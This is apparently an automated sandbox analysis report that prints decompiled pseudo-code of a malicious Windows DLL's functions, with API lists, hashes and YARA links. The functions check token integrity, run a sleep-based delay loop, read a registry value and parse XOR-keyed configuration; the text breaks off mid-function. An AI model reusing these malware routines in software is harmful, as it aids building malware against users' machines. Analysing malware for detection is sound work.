                                  • Part of subcall function 052F4454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 052F4518
                                  • Part of subcall function 052F4454: HeapFree.KERNEL32(00000000,00000000), ref: 052F4536
                                  • Part of subcall function 052F6837: RtlAllocateHeap.NTDLL(00000000,00000000,052F4197), ref: 052F6843
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
                                • String ID:
                                • API String ID: 2910951584-0
                                • Opcode ID: 25284562e2e70c8729b18e03b3aff681cf78cecfe5a25e6c3d43d264f309014d
                                • Instruction ID: 189b1859808b6fcd0fea510b48f7478f67962a25f2ffcfbf421b56e1ff0d9e13
                                • Opcode Fuzzy Hash: 25284562e2e70c8729b18e03b3aff681cf78cecfe5a25e6c3d43d264f309014d
                                • Instruction Fuzzy Hash: 2E518171B30216ABDB15DBA4F84EB6EFBA9BF44720F150035FA19E7280DB75D9408B90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F113D, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E052F113D(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x52fa2b4 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E052F6837(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E052F50CA(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                0x052f114a
                                0x052f1151
                                0x052f1158
                                0x052f116c
                                0x052f1177
                                0x052f118f
                                0x052f119c
                                0x052f119f
                                0x052f11a4
                                0x052f11af
                                0x052f11b3
                                0x052f11c2
                                0x052f11c6
                                0x052f11e2
                                0x052f11e2
                                0x052f11e6
                                0x052f11e6
                                0x052f11eb
                                0x052f11ef
                                0x052f11f5
                                0x052f11f6
                                0x052f11fd
                                0x052f1203

                                APIs
                                • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 052F116F
                                • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 052F118F
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 052F119F
                                • CloseHandle.KERNEL32(00000000), ref: 052F11EF
                                  • Part of subcall function 052F6837: RtlAllocateHeap.NTDLL(00000000,00000000,052F4197), ref: 052F6843
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 052F11C2
                                • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 052F11CA
                                • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 052F11DA
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                • String ID:
                                • API String ID: 1295030180-0
                                • Opcode ID: 3d04275afb8ab38a99490d4d93bb4c587b97b0e55470b38aa170f2578e668f6b
                                • Instruction ID: 4ee25992f1db26d6ee70052f8a1e70af3a3b244592e3b62dbe8c472dbffd676c
                                • Opcode Fuzzy Hash: 3d04275afb8ab38a99490d4d93bb4c587b97b0e55470b38aa170f2578e668f6b
                                • Instruction Fuzzy Hash: 6D215C75910209FFEB109F90EC89EAEBFB8FF08314F004079F601A2291CB719A54EB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F6B0F, Relevance: 10.6, APIs: 7, Instructions: 72sleepmemorytimeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 73%
                                			E052F6B0F(signed int __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				char _v32;
				long _v40;
				void* _t14;
				void* _t16;
				int _t18;
				signed int _t20;
				void* _t22;
				signed int _t23;
				intOrPtr _t25;
				unsigned int _t29;
				signed int _t33;
				signed int _t40;

				_t33 = __edx;
				_t14 = HeapCreate(0, 0x400000, 0); // executed
				 *0x52fa290 = _t14;
				if(_t14 != 0) {
					 *0x52fa180 = GetTickCount();
					_t16 = E052F4C1B(_a4);
					if(_t16 != 0) {
						L10:
						return _t16;
					} else {
						goto L3;
					}
					do {
						L3:
						GetSystemTimeAsFileTime( &_v12);
						_t18 = SwitchToThread();
						_t29 = _v12.dwHighDateTime;
						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
						_push(0);
						_push(9);
						_push(_t29 >> 7);
						_push(_t20);
						L052F7EEA();
						_t40 = _t18 + _t20;
						_t22 = E052F414A(_a4, _t40);
						_t23 = 2;
						Sleep(_t23 << _t40); // executed
					} while (_t22 == 1);
					_t25 =  *0x52fa2ac; // 0x310
					_v32 = 0;
					if(_t25 != 0) {
						__imp__(_t25,  &_v32);
						if(_t25 == 0) {
							_v40 = 0;
						}
						if(_v40 != 0) {
							 *0x52fa2b8 = 1; // executed
						}
					}
					_t16 = E052F53F2(_t33); // executed
					goto L10;
				}
				_t16 = 8;
				goto L10;
			}
















                                0x052f6b0f
                                0x052f6b24
                                0x052f6b2c
                                0x052f6b31
                                0x052f6b44
                                0x052f6b49
                                0x052f6b50
                                0x052f6bd8
                                0x052f6bde
                                0x00000000
                                0x00000000
                                0x00000000
                                0x052f6b56
                                0x052f6b56
                                0x052f6b5b
                                0x052f6b61
                                0x052f6b67
                                0x052f6b71
                                0x052f6b75
                                0x052f6b76
                                0x052f6b7b
                                0x052f6b7c
                                0x052f6b7d
                                0x052f6b82
                                0x052f6b88
                                0x052f6b91
                                0x052f6b97
                                0x052f6b9d
                                0x052f6ba2
                                0x052f6ba9
                                0x052f6bad
                                0x052f6bb5
                                0x052f6bbd
                                0x052f6bbf
                                0x052f6bbf
                                0x052f6bc7
                                0x052f6bc9
                                0x052f6bc9
                                0x052f6bc7
                                0x052f6bd3
                                0x00000000
                                0x052f6bd3
                                0x052f6b35
                                0x00000000

                                APIs
                                • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 052F6B24
                                • GetTickCount.KERNEL32 ref: 052F6B3B
                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 052F6B5B
                                • SwitchToThread.KERNEL32(?,00000001), ref: 052F6B61
                                • _aullrem.NTDLL(?,?,00000009,00000000), ref: 052F6B7D
                                • Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 052F6B97
                                • IsWow64Process.KERNEL32(00000310,?,?,00000001), ref: 052F6BB5
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
                                • String ID:
                                • API String ID: 3690864001-0
                                • Opcode ID: d42f9bd16b4edd4658b18415556f5cc6e4dd306f3df73e36fcf7c480634d9694
                                • Instruction ID: d1f60eab5419a4fc72246eb271c7f06804c7c0065cc5550123cb52b4bbb1406b
                                • Opcode Fuzzy Hash: d42f9bd16b4edd4658b18415556f5cc6e4dd306f3df73e36fcf7c480634d9694
                                • Instruction Fuzzy Hash: 5321A8B1A24215AFD7109F64F88EF6ABBD8FF44360F10493DF64AD6180EB75D8448B61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F71A5, Relevance: 4.6, APIs: 3, Instructions: 54registryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E052F71A5(void* __ecx, void* __eflags) {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				intOrPtr _t15;
				intOrPtr _t19;
				long _t24;
				long _t29;
				short* _t31;
				short* _t34;

				_t15 =  *0x52fa2d4; // 0x215d5a8
				_v8 = _v8 & 0x00000000;
				_t3 = _t15 + 0x52fba30; // 0x4f0053
				_v16 = 4;
				_t31 = E052F3875(__ecx, _t3);
				if(_t31 != 0) {
					_t19 =  *0x52fa2d4; // 0x215d5a8
					_t5 = _t19 + 0x52fba8c; // 0x6e0049
					_t34 = E052F3875(__ecx, _t5);
					if(_t34 != 0) {
						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
						if(_t24 == 0) {
							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
							if(_t29 != 0) {
								_v8 = _v8 & 0x00000000;
							}
							RegCloseKey(_v12);
						}
						E052F50CA(_t34);
					}
					E052F50CA(_t31);
				}
				return _v8;
			}













                                0x052f71ab
                                0x052f71b0
                                0x052f71b5
                                0x052f71bc
                                0x052f71c8
                                0x052f71cc
                                0x052f71ce
                                0x052f71d4
                                0x052f71e0
                                0x052f71e4
                                0x052f71f7
                                0x052f71ff
                                0x052f7213
                                0x052f721b
                                0x052f721d
                                0x052f721d
                                0x052f7224
                                0x052f7224
                                0x052f722b
                                0x052f722b
                                0x052f7231
                                0x052f7236
                                0x052f723c

                                APIs
                                  • Part of subcall function 052F3875: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,052F71C8,004F0053,00000000,?), ref: 052F387E
                                  • Part of subcall function 052F3875: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,052F71C8,004F0053,00000000,?), ref: 052F38A8
                                  • Part of subcall function 052F3875: memset.NTDLL ref: 052F38BC
                                • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 052F71F7
                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 052F7213
                                • RegCloseKey.ADVAPI32(00000000), ref: 052F7224
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: CloseOpenQueryValuelstrlenmemcpymemset
                                • String ID:
                                • API String ID: 830012212-0
                                • Opcode ID: dce86e2a44bbf641016f2f4755a514d463603fac548db5b9086cf5c20e8ef364
                                • Instruction ID: 4595a290d431449b0a80ae7644d77a9a837f1b4dc9b00b2130d79be3f9fa48d3
                                • Opcode Fuzzy Hash: dce86e2a44bbf641016f2f4755a514d463603fac548db5b9086cf5c20e8ef364
                                • Instruction Fuzzy Hash: 3C110C72620209BBDB11DBD4FC89FAEB7BCAF14610F140079B60AE7141EB74D6049B60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F5685, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				signed int _t11;
				void* _t13;

				_t13 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x52fa294) == 0) {
						E052F5076();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x52fa294) == 1) {
						_t10 = E052F6B0F(_t11, _a4); // executed
						if(_t10 != 0) {
							_t13 = 0;
						}
					}
				}
				return _t13;
			}







                                0x052f568c
                                0x052f568d
                                0x052f5690
                                0x052f56c2
                                0x052f56c4
                                0x052f56c4
                                0x052f5692
                                0x052f5693
                                0x052f56a8
                                0x052f56af
                                0x052f56b1
                                0x052f56b1
                                0x052f56af
                                0x052f5693
                                0x052f56cc

                                APIs
                                • InterlockedIncrement.KERNEL32(052FA294), ref: 052F569A
                                  • Part of subcall function 052F6B0F: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 052F6B24
                                • InterlockedDecrement.KERNEL32(052FA294), ref: 052F56BA
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Interlocked$CreateDecrementHeapIncrement
                                • String ID:
                                • API String ID: 3834848776-0
                                • Opcode ID: 7e7bf7cad7bc231c16359704990eaa44c7ec2424369ea65209624c662b5dc27a
                                • Instruction ID: ab0d8f184e730216ad5eb5e60fe23498e6bcb2dd236cbc174760e37263fac377
                                • Opcode Fuzzy Hash: 7e7bf7cad7bc231c16359704990eaa44c7ec2424369ea65209624c662b5dc27a
                                • Instruction Fuzzy Hash: B9E04F353382236787226A64B80CBAEEA51BF06F92F008438B769D1078DA60D880D7E1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F1AB8, Relevance: 2.6, APIs: 2, Instructions: 94memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 87%
                                			E052F1AB8(void* __edx) {
				char _v8;
				char _v12;
				void* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E052F4C8C(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x52fa2d4; // 0x215d5a8
				_t4 = _t24 + 0x52fbd60; // 0x7459308
				_t5 = _t24 + 0x52fbd08; // 0x4f0053
				_t45 = E052F5384( &_v16, _v8, _t5, _t4);
				if(_t45 == 0) {
					 *0x52fa124(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x52fa2d4; // 0x215d5a8
						_t11 = _t32 + 0x52fbd54; // 0x74592fc
						_t48 = _t11;
						_t12 = _t32 + 0x52fbd08; // 0x4f0053
						_t52 = E052F5D37(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x52fa2d4; // 0x215d5a8
							_t13 = _t35 + 0x52fbd9e; // 0x30314549
							if(E052F74B6(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x52fa2b4 - 6;
								if( *0x52fa2b4 <= 6) {
									_t42 =  *0x52fa2d4; // 0x215d5a8
									_t15 = _t42 + 0x52fbbaa; // 0x52384549
									E052F74B6(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x52fa2d4; // 0x215d5a8
							_t17 = _t38 + 0x52fbd98; // 0x7459340
							_t18 = _t38 + 0x52fbd70; // 0x680043
							_t45 = E052F1F7A(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x52fa290, 0, _t52);
						}
					}
					HeapFree( *0x52fa290, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E052F3C84(_t54);
				}
				return _t45;
			}

















                                0x052f1ab8
                                0x052f1ac8
                                0x052f1acb
                                0x052f1ad2
                                0x052f1ad4
                                0x052f1ad4
                                0x052f1ad7
                                0x052f1adc
                                0x052f1ae3
                                0x052f1af5
                                0x052f1af9
                                0x052f1b07
                                0x052f1b15
                                0x052f1b19
                                0x052f1baa
                                0x052f1baa
                                0x052f1b1f
                                0x052f1b1f
                                0x052f1b24
                                0x052f1b24
                                0x052f1b2b
                                0x052f1b37
                                0x052f1b39
                                0x052f1b3b
                                0x052f1b3d
                                0x052f1b44
                                0x052f1b56
                                0x052f1b58
                                0x052f1b5f
                                0x052f1b61
                                0x052f1b68
                                0x052f1b73
                                0x052f1b73
                                0x052f1b5f
                                0x052f1b78
                                0x052f1b7d
                                0x052f1b84
                                0x052f1ba2
                                0x052f1ba4
                                0x052f1ba4
                                0x052f1b3b
                                0x052f1bb6
                                0x052f1bb6
                                0x052f1bb8
                                0x052f1bbd
                                0x052f1bbf
                                0x052f1bbf
                                0x052f1bca

                                APIs
                                • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,07459340,?,00000000,30314549,00000014,004F0053,074592FC), ref: 052F1BA4
                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,052F20B0), ref: 052F1BB6
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: 300afab12e48dfbc3b9f357c8944ee087256ee75294eda3cccbe8719706c0422
                                • Instruction ID: abd88265a3be537c9734eb7c0d9c63c20436723a49fa5a968a794c9b17da76d9
                                • Opcode Fuzzy Hash: 300afab12e48dfbc3b9f357c8944ee087256ee75294eda3cccbe8719706c0422
                                • Instruction Fuzzy Hash: 2631AC32A20109EFDB11DBA0FD89E9EBBB9EF48714F040076F609A7090DB759A44DB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Function 052F2206, Relevance: 10.7, APIs: 7, Instructions: 204memoryCOMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 94%
                                			E052F2206(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t26;
				signed int _t31;
				signed int _t37;
				char* _t43;
				char* _t44;
				char* _t45;
				char* _t46;
				char* _t47;
				void* _t48;
				void* _t49;
				intOrPtr _t50;
				signed int _t56;
				void* _t58;
				void* _t59;
				signed int _t61;
				signed int _t65;
				signed int _t69;
				signed int _t73;
				signed int _t77;
				signed int _t81;
				void* _t86;
				intOrPtr _t102;

				_t87 = __ecx;
				_t26 =  *0x52fa2d0; // 0x63699bc3
				if(E052F1BCB( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x110) {
					 *0x52fa324 = _v8;
				}
				_t31 =  *0x52fa2d0; // 0x63699bc3
				if(E052F1BCB( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
					_v12 = 2;
					L50:
					return _v12;
				}
				_t37 =  *0x52fa2d0; // 0x63699bc3
				if(E052F1BCB( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
					L48:
					HeapFree( *0x52fa290, 0, _v16);
					goto L50;
				} else {
					_t86 = _v12;
					if(_t86 == 0) {
						_t43 = 0;
					} else {
						_t81 =  *0x52fa2d0; // 0x63699bc3
						_t43 = E052F38CE(_t87, _t86, _t81 ^ 0x724e87bc);
					}
					if(_t43 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
							 *0x52fa298 = _v8;
						}
					}
					if(_t86 == 0) {
						_t44 = 0;
					} else {
						_t77 =  *0x52fa2d0; // 0x63699bc3
						_t44 = E052F38CE(_t87, _t86, _t77 ^ 0x2b40cc40);
					}
					if(_t44 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
							 *0x52fa29c = _v8;
						}
					}
					if(_t86 == 0) {
						_t45 = 0;
					} else {
						_t73 =  *0x52fa2d0; // 0x63699bc3
						_t45 = E052F38CE(_t87, _t86, _t73 ^ 0x3b27c2e6);
					}
					if(_t45 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x52fa2a0 = _v8;
						}
					}
					if(_t86 == 0) {
						_t46 = 0;
					} else {
						_t69 =  *0x52fa2d0; // 0x63699bc3
						_t46 = E052F38CE(_t87, _t86, _t69 ^ 0x0602e249);
					}
					if(_t46 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x52fa004 = _v8;
						}
					}
					if(_t86 == 0) {
						_t47 = 0;
					} else {
						_t65 =  *0x52fa2d0; // 0x63699bc3
						_t47 = E052F38CE(_t87, _t86, _t65 ^ 0x3603764c);
					}
					if(_t47 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x52fa02c = _v8;
						}
					}
					if(_t86 == 0) {
						_t48 = 0;
					} else {
						_t61 =  *0x52fa2d0; // 0x63699bc3
						_t48 = E052F38CE(_t87, _t86, _t61 ^ 0x2cc1f2fd);
					}
					if(_t48 != 0) {
						_push(_t48);
						_t58 = 0x10;
						_t59 = E052F3E49(_t58);
						if(_t59 != 0) {
							_push(_t59);
							E052F50DF();
						}
					}
					if(_t86 == 0) {
						_t49 = 0;
					} else {
						_t56 =  *0x52fa2d0; // 0x63699bc3
						_t49 = E052F38CE(_t87, _t86, _t56 ^ 0xb30fc035);
					}
					if(_t49 != 0 && E052F3E49(0, _t49) != 0) {
						_t102 =  *0x52fa37c; // 0x7459630
						E052F10DD(_t102 + 4, _t54);
					}
					_t50 =  *0x52fa2d4; // 0x215d5a8
					_t20 = _t50 + 0x52fb252; // 0x74587fa
					_t21 = _t50 + 0x52fb7b5; // 0x6976612e
					 *0x52fa320 = _t20;
					 *0x52fa390 = _t21;
					HeapFree( *0x52fa290, 0, _t86);
					_v12 = 0;
					goto L48;
				}
			}





























                                0x052f2206
                                0x052f2209
                                0x052f2229
                                0x052f2237
                                0x052f2237
                                0x052f223c
                                0x052f2256
                                0x052f242a
                                0x052f2431
                                0x052f2438
                                0x052f2438
                                0x052f225c
                                0x052f2278
                                0x052f2418
                                0x052f2422
                                0x00000000
                                0x052f227e
                                0x052f227e
                                0x052f2283
                                0x052f2299
                                0x052f2285
                                0x052f2285
                                0x052f2292
                                0x052f2292
                                0x052f22a3
                                0x052f22a5
                                0x052f22af
                                0x052f22b4
                                0x052f22b4
                                0x052f22af
                                0x052f22bb
                                0x052f22d1
                                0x052f22bd
                                0x052f22bd
                                0x052f22ca
                                0x052f22ca
                                0x052f22d5
                                0x052f22d7
                                0x052f22e1
                                0x052f22e6
                                0x052f22e6
                                0x052f22e1
                                0x052f22ed
                                0x052f2303
                                0x052f22ef
                                0x052f22ef
                                0x052f22fc
                                0x052f22fc
                                0x052f2307
                                0x052f2309
                                0x052f2313
                                0x052f2318
                                0x052f2318
                                0x052f2313
                                0x052f231f
                                0x052f2335
                                0x052f2321
                                0x052f2321
                                0x052f232e
                                0x052f232e
                                0x052f2339
                                0x052f233b
                                0x052f2345
                                0x052f234a
                                0x052f234a
                                0x052f2345
                                0x052f2351
                                0x052f2367
                                0x052f2353
                                0x052f2353
                                0x052f2360
                                0x052f2360
                                0x052f236b
                                0x052f236d
                                0x052f2377
                                0x052f237c
                                0x052f237c
                                0x052f2377
                                0x052f2383
                                0x052f2399
                                0x052f2385
                                0x052f2385
                                0x052f2392
                                0x052f2392
                                0x052f239d
                                0x052f239f
                                0x052f23a2
                                0x052f23a3
                                0x052f23aa
                                0x052f23ac
                                0x052f23ad
                                0x052f23ad
                                0x052f23aa
                                0x052f23b4
                                0x052f23ca
                                0x052f23b6
                                0x052f23b6
                                0x052f23c3
                                0x052f23c3
                                0x052f23ce
                                0x052f23dc
                                0x052f23e6
                                0x052f23e6
                                0x052f23eb
                                0x052f23f1
                                0x052f23fe
                                0x052f2404
                                0x052f240a
                                0x052f240f
                                0x052f2415
                                0x00000000
                                0x052f2415

                                APIs
                                • StrToIntExA.SHLWAPI(00000000,00000000,052F55D3,?,052F55D3,63699BC3,?,?,63699BC3,052F55D3,?,63699BC3,E8FA7DD7,052FA00C,74ECC740), ref: 052F22AB
                                • StrToIntExA.SHLWAPI(00000000,00000000,052F55D3,?,052F55D3,63699BC3,?,?,63699BC3,052F55D3,?,63699BC3,E8FA7DD7,052FA00C,74ECC740), ref: 052F22DD
                                • StrToIntExA.SHLWAPI(00000000,00000000,052F55D3,?,052F55D3,63699BC3,?,?,63699BC3,052F55D3,?,63699BC3,E8FA7DD7,052FA00C,74ECC740), ref: 052F230F
                                • StrToIntExA.SHLWAPI(00000000,00000000,052F55D3,?,052F55D3,63699BC3,?,?,63699BC3,052F55D3,?,63699BC3,E8FA7DD7,052FA00C,74ECC740), ref: 052F2341
                                • StrToIntExA.SHLWAPI(00000000,00000000,052F55D3,?,052F55D3,63699BC3,?,?,63699BC3,052F55D3,?,63699BC3,E8FA7DD7,052FA00C,74ECC740), ref: 052F2373
                                • HeapFree.KERNEL32(00000000,?,?,052F55D3,63699BC3,?,?,63699BC3,052F55D3,?,63699BC3,E8FA7DD7,052FA00C,74ECC740), ref: 052F240F
                                • HeapFree.KERNEL32(00000000,?,?,052F55D3,63699BC3,?,?,63699BC3,052F55D3,?,63699BC3,E8FA7DD7,052FA00C,74ECC740), ref: 052F2422
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: f12869f7f55a2d08b03db7cc978944647a8d1f06c520989a6cadab570bad3518
                                • Instruction ID: 1c3fbb1a38fa765b5608431692dce691b71ce09262adb54d900ca9fbc88f42d4
                                • Opcode Fuzzy Hash: f12869f7f55a2d08b03db7cc978944647a8d1f06c520989a6cadab570bad3518
                                • Instruction Fuzzy Hash: E0615CB5B34105EAC715DBB5FD8DC5EBBA9BF49610B140936B60AE3240EB31D9409B20
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F6EFC, Relevance: 34.7, APIs: 23, Instructions: 220memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 70%
                                			E052F6EFC(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				intOrPtr _v40;
				void* __ecx;
				void* __edi;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t84;
				int _t87;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t92;
				int _t95;
				void* _t98;
				void* _t99;
				void* _t103;
				intOrPtr _t105;
				long _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				long _t110;
				int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t103 = __edx;
				_t110 = __eax;
				_v8 = 8;
				_t117 = RtlAllocateHeap( *0x52fa290, 0, 0x800);
				if(_t117 != 0) {
					if(_t110 == 0) {
						_t110 = GetTickCount();
					}
					_t31 =  *0x52fa018; // 0x4934a3dd
					asm("bswap eax");
					_t32 =  *0x52fa014; // 0x5cb11ae7
					asm("bswap eax");
					_t33 =  *0x52fa010; // 0x15dc9586
					asm("bswap eax");
					_t34 =  *0x52fa00c; // 0x69ab8210
					asm("bswap eax");
